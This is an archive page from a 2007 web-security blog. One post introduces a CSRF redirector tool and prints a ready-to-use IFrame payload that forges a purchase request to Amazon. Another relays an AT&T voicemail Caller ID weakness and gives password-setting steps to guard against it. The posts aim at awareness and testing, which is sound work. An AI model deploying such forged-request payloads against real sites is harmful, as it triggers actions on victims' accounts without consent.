About the Author

Hi, I'm Chris, a web developer and a founding member of Analog. I live and work in Brooklyn, NY.

All Posts for Jul 2007

Skip This Section and Jump to the Main Content

2003
2004
2005
2006
2007
2008
2009
2010

'03:: All; Aug; Sep; Oct; Nov; Dec

'04:: All; Jan; Feb; Mar; Apr; May; Jun; Jul; Aug; Sep; Oct; Nov; Dec

'05:: All; Jan; Feb; Mar; Apr; May; Jun; Jul; Aug; Sep; Oct; Nov; Dec

'06:: All; Jan; Feb; Mar; Apr; May; Jun; Jul; Aug; Sep; Oct; Nov; Dec

'07:: All; Jan; Feb; Mar; Apr; May; Jun; Jul; Aug; Sep; Oct; Nov; Dec

'08:: All; Jan; Feb; Mar; Apr; May; Jun; Jul; Aug; Sep; Oct; Nov; Dec

'09:: All; Jan; Feb; Mar; Apr; May; Jun; Jul; Aug; Sep; Oct; Nov; Dec

'10:: All; Jan; Feb; Mar; Apr; May; Jun; Jul; Aug

CSRF Redirector

Wed, 18 Jul 2007 03:49:53 GMT
16 Comments
References
Link

Inspired by the XSS POST Forwarder, I just created the CSRF Redirector. It's a simple tool that makes it easy to test CSRF using POST, hopefully demonstrating how prevalent CSRF vulnerabilities are as well as reducing the misconception that forging a POST request is complicated.

To use it, construct a URL of the form http://shiflett.org/csrf.php?csrf=URL&NAME=VALUE, where URL is the (URL-encoded) target site, and NAME and VALUE represent a name-value pair, of which there can be zero or more.

For example, the following IFrame exploits the Amazon vulnerability:

<iframe src="http://shiflett.org/csrf.php?csrf=http%3A%2F%2Famazon.com%2Fgp%2Fproduct%2Fhandle-buy-box&ASIN=059600656X&offerListingID=XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf" />

I may add more features at some point. Until then, enjoy!

iPhone Security Concern

Mon, 02 Jul 2007 03:11:06 GMT
6 Comments
References
Link

Nitesh Dhanjani just posted a reminder of an AT&T/Cingular vulnerability he first mentioned over a year ago. If you've recently purchased an iPhone, here's the scary part:

The AT&T/Cingular voicemail system is configured by default not to ask for a password when you check your voicemail from the handset. Unfortunately, the AT&T/Cingular voicemail system trusts Caller ID to determine if the handset is calling it.

I'm not going to claim that Caller ID spoofing is easy, but Paris Hilton can do it. I'm just saying.

Until this vulnerability is fixed, Nitesh recommends setting your voicemail password:

Call your AT&T/Cingular voicemail (dial your own number from the iPhone).
Press 4 to go to Personal Options.
Press 2 to go to Administrative Options.
Press 1 to go to Password.
Press 2 to turn your password On.

Thanks for the reminder, Nitesh!

Upcoming Events

Brooklyn Beta

21 - 22 Oct 2010

At The Invisible Dog, Brooklyn, New York.

New Comments

Mario Arroyo wrote:: The article is really very good and the users comments and external links to another articles jus...; Posted in
Raphael Almeida wrote:: I realy like hiphop music, but this is very crazy! We'll use it in user group PHP conference at ...; Posted in PHP Anthem
Mal wrote:: Having used smarty for many years, this has never been a problem for me, but after building a web...; Posted in PHP Stripping Newlines
Satya wrote:: Thanks for the info. I have posted the news here on my page: http://www.facebook.com/pages/Web-Sc...; Posted in PHP Anthem
John wrote:: Oh, you need to press "save your password".; Posted in Mozilla Account Manager